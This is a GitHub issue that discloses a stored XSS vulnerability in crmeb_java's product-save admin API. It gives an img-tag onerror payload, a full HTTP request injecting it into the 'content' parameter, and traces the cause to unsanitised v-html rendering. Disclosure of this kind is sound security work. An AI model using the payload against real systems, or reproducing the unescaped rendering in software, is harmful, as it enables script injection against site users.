Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a stored XSS vulnerability in the /api/admin/store/product/save interface of the crmeb_java system #12

Open
Mechoy opened this issue Mar 15, 2023 · 0 comments

Comments

@Mechoy
Copy link

Mechoy commented Mar 15, 2023

[Suggested description]
Store XSS vulnerability exists in crmeb_java <=1.3.4
Failure to filter or validate parameters effectively results in stored XSS.

[Vulnerability Type]
Stored XSS

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/admin/store/product/save

[Attack Type]
Remote

[Vulnerability details]
payload :

<img src=\"1111\" alt=\"2222\" width=\"33\" height=\"33\" onclick=\"alert`333`\" onerror=alert(2)/>

Get the request message of the /api/admin/store/product/save interface.

POST /api/admin/store/product/save HTTP/2
Host: api.java.crmeb.net
Content-Length: 1213
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/json
Authori-Zation: 213ff6ff1ca24ae78f8263bd7ad0ea6c
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://admin.java.crmeb.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.java.crmeb.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","sliderImages":["https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg"],"videoLink":"","sliderImage":"[\"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg\"]","storeName":"3333","storeInfo":"2132131","keyword":"1111","cateIds":[972,1185],"cateId":"972,1185","unitName":"1111","sort":1,"giveIntegral":1,"ficti":2,"isShow":false,"isBenefit":false,"isNew":false,"isGood":false,"isHot":true,"isBest":false,"tempId":94,"attrValue":[{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","price":0,"cost":0,"otPrice":0,"stock":0,"barCode":"","weight":0,"volume":0,"attrValue":"{\"规格\":\"默认\"}"}],"attr":[{"attrName":"规格","attrValues":"默认","id":0}],"selectRule":"","isSub":false,"content":"111","specType":false,"id":0,"couponIds":[],"coupons":[],"activity":["默认","秒杀","砍价","拼团"]}

The content parameter has a stored XSS vulnerability.
Insert the payload and send the request packet.
crmeb_java_2_1
Find the added product and enter the product details page, click the inserted img tag to trigger the vulnerability.
crmeb_java_2_2
There you can see it!

[Impact Code execution]
true

[Cause of vulnerability]
com.zbkj.admin.controller.StoreProductController line 77.
The save() method of storeProductService is called on line 77 of this controller
crmeb_java_2_3
Follow up this method to com.zbkj.service.service.impl.StoreProductServiceImpl.
On line 339, save the value of the content parameter in the request packet to the database.
Come to the front page.
In crmeb_java\admin\src\views\store\creatStore\index.vue, in line 296, use v-html to render the obtained content value. It is known that v-html will treat the obtained content as HTML code to render.
crmeb_java_2_4
The reason for this vulnerability is that there is no legal security check on user data.

The end,thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant